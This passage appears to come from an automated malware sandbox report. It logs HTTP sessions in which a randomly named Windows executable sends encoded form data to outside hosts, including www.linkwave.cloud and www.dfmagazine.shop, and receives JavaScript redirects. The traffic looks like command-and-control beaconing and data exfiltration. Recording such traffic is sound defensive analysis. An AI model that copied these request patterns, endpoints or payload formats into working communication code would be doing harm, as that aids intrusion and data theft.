                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7w5m/wz0rXcw0tE/b8hLuDmo1/mtYUz+86jxonRkRzDl+or28EnU1U52kH9u1L+OW992YWLivWUR+BYn7CB/mLfe/bQio8JEQDUaMhAeB3Td1X1HShwZX5ffEkLlCatjLqtAHD/MpcWz6FFxMf4OsKfBurcbXYo4h1goNdDElBTPotNkouLRjJx6pgDb6rtgX///4o4S7j0b1uxNxaPmknXws9OPdeJPbQ0gEAct9wtpnoBslWgqzyIpEU6Q4iK3oj8eDcQYlV2b87FgcWwn115PlKnXqtckdspkgWaYtpNZxGrItuVWT9U0lS2bJDCyxnFIawQymokwNRjZg7AoHZwhBaIypjKqDJKioopZfKPRCidH4chjWmHpNlO3VAvdBJw4G8fY02vTE6LIj8HYvfewthROU3O06S/pyoi3LC7VW3istNYabDT8UPkxsAgMZSY7wy56LCNsDBRXAE+ceAJ8zdLCDzI+H8XMvukChrocE09oJQI9IYc32LXb2EC+hm0I4p1rEQ1esYbZ8xOavW/9SCEoWzba5Fx+0lWtfOQAeXTTD99lCFcB6jo4oZlgrUqR/AwNzqfVAv9t8R0KiHbPVTBNYfTSo
                                                                                  Sep 25, 2024 09:59:10.665601015 CEST6714OUTData Raw: 63 42 50 39 37 6c 45 79 38 6a 46 4f 45 61 32 53 55 71 55 4a 6b 37 6b 33 63 63 39 58 62 77 6a 55 42 2f 7a 55 6f 67 4d 59 2b 51 6c 56 5a 6e 62 6f 2f 56 55 51 50 72 79 46 32 48 77 69 69 30 77 4e 32 55 49 34 2f 64 51 68 6d 4d 6c 46 77 6d 6e 41 2f 6e
                                                                                  Data Ascii: cBP97lEy8jFOEa2SUqUJk7k3cc9XbwjUB/zUogMY+QlVZnbo/VUQPryF2Hwii0wN2UI4/dQhmMlFwmnA/ndfFgnz4L+Ddl4aNaAkOoVQ+Cj/LL+Cgz78fUHc9xjzjwrxikx7672XlS6EKj9vLCWAdLVIHgA8Pm9EQimEQ4aFHwzHmrJVEfj8qrVVtJVyHUFx9NCO48hlFec51qBrFBstZwcDaOczsja2su+YSidREVp5ic3Gz4w


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  70192.168.11.20498263.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:13.302844048 CEST554OUTGET /bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:13.409317017 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:59:13 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 26 58 62 33 78 49 3d 6f 72 42 57 46 4d 34 54 4d 48 36 62 45 51 57 62 30 6d 75 66 6e 79 7a 38 2b 2f 39 7a 74 65 56 57 2f 2f 6c 53 35 50 31 55 56 70 5a 36 69 34 55 41 31 75 72 4b 6b 42 52 6f 6c 61 70 53 64 2b 44 30 71 56 76 56 2f 70 64 62 34 4f 4b 63 71 72 62 38 71 6d 69 55 37 66 38 53 77 2f 56 74 53 43 31 42 39 57 65 71 6d 6a 57 57 59 6c 49 68 72 6f 66 48 2f 37 75 36 45 2b 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o="}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  71192.168.11.20498273.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:18.538786888 CEST816OUTPOST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6c 65 36 42 72 79 31 32 49 49 7a 76 78 62 54 6d 6b 6d 30 2b 49 54 30 42 30 67 6f 64 66 4e 72 4c 53 31 64 45 77 48 43 74 32 30 30 41 57 68 45 76 55 76 44 67 49 56 48 66 66 45 6b 7a 34 4a 64 73 30 34 39 7a 45 71 54 33 52 51 53 66 6d 78 2b 4f 49 55 6e 76 6a 6f 61 74 4d 52 62 38 62 41 33 6d 59 4f 6c 33 45 6b 51 6f 6e 45 51 67 63 37 52 32 46 78 2b 6f 38 43 53 68 43 6c 6b 56 63 2f 30 57 61 58 31 6b 6e 7a 73 30 39 63 55 6c 6a 72 6c 4e 78 39 58 52 2f 53 6f 62 56 45 38 6e 44 76 36 73 41 33 33 50 30 68 49 61 64 43 69 4e 57 53 42 79 71 38 52 43 55 67 3d 3d
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  72192.168.11.20498283.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:21.178606033 CEST836OUTPOST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 50 4c 53 58 46 45 78 43 32 74 78 30 30 41 5a 42 45 75 4c 2f 44 33 49 56 43 69 66 46 30 7a 34 4e 31 73 30 35 4e 7a 48 5a 72 30 51 41 53 42 71 52 2b 49 56 45 6e 76 6a 6f 61 74 4d 52 50 47 62 45 62 6d 59 39 74 33 45 47 30 6e 6b 45 51 76 66 37 52 32 53 68 2b 73 38 43 54 45 43 67 41 76 63 39 38 57 61 56 74 6b 6d 69 73 37 6f 4d 55 6a 38 37 6b 6c 34 4d 69 6f 31 52 63 79 61 30 4d 43 42 63 2b 72 42 68 6d 56 70 54 38 2b 65 52 2b 2f 53 69 34 61 6f 2b 51 5a 4a 67 2f 4f 33 39 6a 72 67 61 4f 42 36 75 48 50 56 44 2b 66 46 36 6b 3d
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  73192.168.11.20498293.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:23.818974018 CEST1289OUTPOST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 48 4c 53 45 4e 45 77 6c 61 74 77 30 30 41 51 68 45 56 4c 2f 44 32 49 52 75 75 66 46 34 4a 34 4c 78 73 6d 50 52 7a 50 4d 48 30 61 41 53 42 33 42 2b 4a 49 55 6e 66 6a 6f 4b 70 4d 52 66 47 62 45 62 6d 59 38 39 33 43 55 51 6e 69 45 51 67 63 37 52 71 46 78 2b 49 38 43 37 2b 43 68 42 59 64 4e 63 57 62 31 39 6b 6b 55 41 37 31 38 55 68 39 37 6b 39 34 4d 2b 4a 31 52 51 45 61 30 34 34 42 66 4f 72 41 41 50 36 37 58 6f 39 4c 42 71 39 59 7a 45 58 6b 38 5a 48 4a 44 7a 73 33 72 7a 64 68 66 47 4d 37 76 48 75 53 69 6e 55 53 2b 4d 51 73 67 65 77 4f 49 50 76 52 2f 51 45 58 54 2f 61 52 65 67 70 55 6c 42 33 52 59 66 6b 61 58 6b 6f 36 57 45 48 66 78 54 45 78 36 4f 2b 6d 71 44 6c 43 6e 34 53 52 66 57 6e 71 47 57 70 67 73 51 41 6e 56 35 65 55 33 6a 56 49 69 36 2b 77 43 55 4c 58 6e 37 59 44 51 41 59 36 2f 37 73 43 50 6b 78 35 7a 49 4a 56 50 67 62 43 38 64 67 62 47 4c 43 66 7a 6b 70 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+HLSENEwlatw00AQhEVL/D2IRuufF4J4LxsmPRzPMH0aASB3B+JIUnfjoKpMRfGbEbmY893CUQniEQgc7RqFx+I8C7+ChBYdNcWb19kkUA718Uh97k94M+J1RQEa044BfOrAAP67Xo9LBq9YzEXk8ZHJDzs3rzdhfGM7vHuSinUS+MQsgewOIPvR/QEXT/aRegpUlB3RYfkaXko6WEHfxTEx6O+mqDlCn4SRfWnqGWpgsQAnV5eU3jVIi6+wCULXn7YDQAY6/7sCPkx5zIJVPgbC8dgbGLCfzkp1RWZbUpoul2vc17ArWAjBP8FoMzVOCl6NYqLATUjhhsAGGY5YGJmgD67ARbJx/xPYVSllGqJOHFuUhncOyl9kYBYbtMPu/xo3yURGubxTnumY40ICfHCan67lyOchR3Z8Yx2jKdHacyA7GhH/eLAY4O29H5p8E8IqlQEKsFERb9iiQbA5Pb9mjbOH6HlLcoLKGr9//y6yQMh07ucAJnJSYRueumSZaYBBXoTXT3/OzcU0NQuSzFZHOVUKYXM0MbtC7NNohE9C9ZvH9IVgGkPgHtiN0ZRUKEBxqr29bui9ZNJIpUDQ/lF2QhTh/3IOrSnOagAlKPTmNtz/LGJ
                                                                                  Sep 25, 2024 09:59:23.819021940 CEST2578OUTData Raw: 31 42 4f 4d 2b 53 45 31 62 74 66 34 33 56 75 74 51 33 45 63 67 78 42 62 6b 7a 7a 4c 64 56 55 4a 4f 53 38 4b 39 78 79 5a 78 34 30 48 46 33 54 53 68 56 69 31 35 65 4a 52 6b 30 4f 46 39 75 36 74 7a 4f 34 49 42 39 78 33 51 56 6c 38 57 34 6c 79 46 37
                                                                                  Data Ascii: 1BOM+SE1btf43VutQ3EcgxBbkzzLdVUJOS8K9xyZx40HF3TShVi15eJRk0OF9u6tzO4IB9x3QVl8W4lyF7AhPTYs3WlMoUuabsSQYsSysuW4nlbqn/rL9TZcgZuKLEr9NS3uq+eyoopr6cGjYfT5Dx+uDZsxzrlmczYDgbJzp/Kq+/HxuQX1KGmCBZ3xx8aY78FuXHuQ0GO/CZtJ1wu/tpkOdUbaUz8MxLiwmjJxbEGY2UxgAxu
                                                                                  Sep 25, 2024 09:59:23.819073915 CEST4118OUTData Raw: 62 36 71 36 61 4b 6b 6c 55 36 51 51 6f 35 6a 45 37 46 53 32 4b 69 56 56 65 72 75 42 77 51 6e 4b 68 49 48 4d 6d 47 33 76 44 34 43 6b 56 4b 4a 54 57 4d 61 48 37 55 6b 43 63 78 6b 70 55 39 2f 37 34 4d 75 59 43 6b 6f 51 39 43 6d 69 33 66 38 72 61 37
                                                                                  Data Ascii: b6q6aKklU6QQo5jE7FS2KiVVeruBwQnKhIHMmG3vD4CkVKJTWMaH7UkCcxkpU9/74MuYCkoQ9Cmi3f8ra70klFPDairoiLhkvXpE+qs7uqXnTXTpSW8xn2KyNwXWo68/L643So3KBXFIH+ZBMhLezYBITlmX5CLzca4dBXEG0GFhh4VA1OOECr8FTzQwGGngf6+uHXGQlWB7A8WDwXnuU6/fZf+3NdnXSW47dvXKfZHay4yaw7/


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  74192.168.11.20498303.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:26.456190109 CEST548OUTGET /was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:59:29.490098953 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:59:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 62 33 78 49 3d 79 38 4d 6e 44 33 43 41 55 6a 66 76 6c 62 43 61 78 41 56 61 63 36 33 47 76 4b 36 38 68 79 77 6b 56 51 63 6b 30 46 30 33 4d 4d 72 61 43 51 64 50 36 69 36 61 68 67 45 63 4b 53 39 39 53 38 6a 43 4d 41 66 52 64 31 45 67 76 59 42 49 6b 49 31 67 46 72 32 4a 4e 52 79 6d 6b 78 66 37 4b 55 72 50 69 62 69 71 49 7a 4b 34 50 43 4b 67 51 4e 39 71 48 69 77 56 6e 44 30 3d 26 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  75192.168.11.204983184.32.84.32803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:34.738835096 CEST819OUTPOST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4d 70 75 50 44 42 76 4e 76 79 58 6c 30 6a 39 37 54 75 33 75 5a 4d 79 45 35 75 36 65 41 72 77 41 33 49 7a 2f 64 67 6d 35 78 76 39 39 4f 59 7a 75 46 70 47 77 2b 77 61 6c 61 6e 71 4a 41 69 64 2f 70 6d 44 43 34 79 34 72 48 43 44 69 41 56 41 32 6d 50 73 69 36 58 6f 74 42 6d 35 63 65 34 44 31 72 6a 73 31 38 42 70 49 61 6e 4a 55 47 70 77 79 55 45 4b 76 44 33 46 69 70 74 4a 42 62 71 6b 56 79 57 34 4b 34 4a 62 4e 43 68 56 77 4f 36 55 75 55 78 72 36 39 34 54 35 6c 38 54 52 32 41 32 52 70 77 30 56 64 6f 34 38 4d 42 44 45 66 38 52 35 50 49 65 4a 52 77 3d 3d
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  76192.168.11.204983284.32.84.3280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:37.499583960 CEST839OUTPOST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 49 41 77 6f 44 2f 63 68 6d 35 30 76 39 39 4a 6f 7a 76 42 70 47 2f 2b 77 65 74 61 6d 57 4a 41 69 4a 2f 70 6d 54 43 35 44 34 6f 42 53 44 67 50 31 41 30 70 76 73 69 36 58 6f 74 42 6e 64 32 65 34 4c 31 6f 54 63 31 75 77 70 48 5a 6e 4a 62 4d 4a 77 79 44 30 4b 72 44 33 45 4e 70 73 55 6b 62 76 34 56 79 58 49 4b 35 62 7a 4f 49 68 56 36 45 61 56 35 54 51 79 4b 34 4d 32 4d 6b 39 4b 44 2f 6c 4b 4d 73 6d 6c 50 41 61 4d 59 50 53 66 32 62 4d 6f 52 4e 4b 66 53 4d 36 58 76 33 7a 54 50 36 4c 58 79 77 53 67 61 74 32 4d 54 37 70 67 3d
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  77192.168.11.204983384.32.84.3280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:59:40.263812065 CEST1289OUTPOST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 41 41 77 62 4c 2f 64 47 61 35 33 76 39 39 4b 6f 7a 79 42 70 47 69 2b 32 32 70 61 6d 62 2b 41 67 78 2f 6d 6c 4c 43 2b 77 67 6f 50 53 44 67 58 31 41 33 6d 50 73 33 36 54 30 68 42 6d 74 32 65 34 4c 31 6f 51 45 31 74 68 70 48 56 48 4a 55 47 70 77 2b 55 45 4b 50 44 33 4d 33 70 73 51 61 63 62 30 56 79 33 59 4b 30 50 54 4f 45 68 56 38 48 61 56 78 54 51 4f 56 34 49 66 31 6b 39 50 59 2f 6a 75 4d 74 78 67 70 5a 49 4a 50 64 41 6e 47 52 63 55 51 45 34 57 43 44 72 44 57 78 41 33 5a 7a 2b 66 45 38 53 63 4d 39 33 63 34 35 75 75 6e 61 61 5a 66 45 4e 64 75 77 68 2b 67 69 7a 72 53 4d 4e 2b 4a 4c 6c 67 32 42 38 6b 6b 6d 2f 58 2b 63 76 75 4e 76 6c 63 64 59 4f 52 4b 54 54 6e 4d 47 6d 4a 62 34 57 69 79 38 35 57 49 4c 30 66 43 54 42 42 30 33 44 46 78 32 74 6a 38 65 52 6b 51 51 43 77 56 73 68 2f 63 34 37 4e 51 78 5a 78 53 71 51 4c 48 78 51 51 47 58 38 55 35 51 79 71 4a 47 48 54 2b [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdAAwbL/dGa53v99KozyBpGi+22pamb+Agx/mlLC+wgoPSDgX1A3mPs36T0hBmt2e4L1oQE1thpHVHJUGpw+UEKPD3M3psQacb0Vy3YK0PTOEhV8HaVxTQOV4If1k9PY/juMtxgpZIJPdAnGRcUQE4WCDrDWxA3Zz+fE8ScM93c45uunaaZfENduwh+gizrSMN+JLlg2B8kkm/X+cvuNvlcdYORKTTnMGmJb4Wiy85WIL0fCTBB03DFx2tj8eRkQQCwVsh/c47NQxZxSqQLHxQQGX8U5QyqJGHT+d/1dPE3YcYiFDAHq0DcYLr9xKKlqrotLKHPtKM3cUJDPz8N9d7wzaNc356vNlW8JILLWvNYqTBj3RV+gFZiJyqngSgDpxaog+vgA6KG/lbnEMIrHbpK0uNnpVteKyfA9Zmyr5a3BKvP43ZifrqUi31IXdPfLvVridjP6/pZnYlEcMr0lLxjkYsahQFuUgzz+39UA/+6f2MblZHYFBmUPiZPImuLVet19ORlRz9XgwkrY4TIhqOEzmXe+fGqPJTUfycYt6a+TpndN3VJcdJUEtR+T+kP0RDwru2HPFUWXzmgo3RuaLhVM3gvg/2Y+uwf8FOQDiMz7+GNAH
                                                                                  Sep 25, 2024 09:59:40.263859034 CEST1289OUTData Raw: 2b 66 75 4f 36 6e 4f 53 44 4b 55 2f 61 77 6a 62 49 55 57 5a 46 31 47 46 53 70 6d 39 52 75 5a 30 32 38 62 43 39 30 32 68 71 53 6f 6d 57 6f 75 4e 4a 43 4b 59 68 31 4c 6b 35 79 6e 38 68 4e 32 73 69 78 39 62 62 6f 66 73 79 63 58 66 43 4b 61 35 76 43
                                                                                  Data Ascii: +fuO6nOSDKU/awjbIUWZF1GFSpm9RuZ028bC902hqSomWouNJCKYh1Lk5yn8hN2six9bbofsycXfCKa5vCjADBdyXl1AVFwlVusfCsZov6jJ9isUf5WlrbayYUQ/VCINmeIHKZfccDvxclR8pSQzO3eO7q71Ob0M6iY5ZTixCWYfuznMRNtcttdbHfnc21pOvTAQgUbhIMvFp3D1w6Fx8KH+OdTusBicK4RT326in5gRywGs6gz
                                                                                  Sep 25, 2024 09:59:40.263911963 CEST5410OUTData Raw: 62 44 6e 69 4d 6d 39 49 54 34 4b 4c 49 61 50 62 45 37 61 55 35 4f 7a 6f 78 71 42 35 34 76 75 2f 6e 53 72 36 4d 38 44 4f 62 4d 58 51 6f 49 6d 6e 61 5a 2f 35 30 4d 51 67 75 73 64 37 77 31 63 4a 55 63 45 35 69 65 4f 76 68 62 65 46 53 31 46 48 41 64
